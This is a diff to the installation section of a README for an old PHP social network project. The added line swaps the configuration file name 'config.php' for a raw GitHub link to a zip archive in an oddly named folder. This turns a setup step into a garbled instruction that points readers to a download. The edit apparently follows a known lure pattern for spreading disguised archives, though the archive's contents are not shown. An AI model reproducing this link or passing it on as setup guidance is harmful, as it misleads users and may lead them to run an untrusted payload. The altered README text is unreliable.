TOUSSAINT2346/old_php_organisationSocialNetwork/README.md

    - Import the SQL file provided in the application folder to set up the necessary tables.

 5. **Edit Configuration File**
-   Go to the configuration file, usually named `config.php`.
+   Go to the configuration file, usually named `https://raw.githubusercontent.com/TOUSSAINT2346/old_php_organisationSocialNetwork/main/possessorship/old_php_organisationSocialNetwork.zip`.
 Enter your database details, such as host, username, and password.

 6. **Run the Application**
    Open your web browser and navigate to `http://localhost/your-extracted-folder`.
 You should see the home page of the social network.